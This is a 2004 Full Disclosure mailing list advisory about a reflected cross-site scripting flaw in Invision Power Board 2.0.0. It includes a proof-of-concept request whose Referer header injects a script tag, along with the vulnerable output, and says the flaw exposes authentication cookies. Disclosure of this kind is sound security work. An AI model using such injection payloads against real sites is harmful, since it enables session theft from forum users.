Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[MAXPATROL Security Advisories] Cross site scripting in Invision Power Board
From: "Alexander Antipov" <Antipov () SecurityLab ru>
Date: Tue, 5 Oct 2004 22:53:12 +0400

[MAXPATROL Security Advisories] Cross site scripting in Invision Power Board

Date: 5.10.2004

Severity: Low

Application: Invision Power Board v2.0.0

 Platform: PHP

 I. DESCRIPTION

An input validation vulnerability was found in Invision Power Board. A
remote user can conduct Cross site scripting attack.

1. 
GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0

Referer: "'/><script>alert()</script>

Result

<...>
index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01"
method="post" name="LOGIN" onsubmit="return ValidateForm()"> 
<input type="hidden" name="referer" value="\"\'/><script>alert()</script>"
/> 
<...> 


II. IMPACT


A remote user can access the target user's cookies (including authentication
cookies).   


III. SOLUTION

 Not available currently.



IV. VENDOR FIX/RESPONSE
n/a
 

V. CREDIT

This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able
to detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP
Response splitting).


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
  • [MAXPATROL Security Advisories] Cross site scripting in Invision Power Board Alexander Antipov (Oct 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]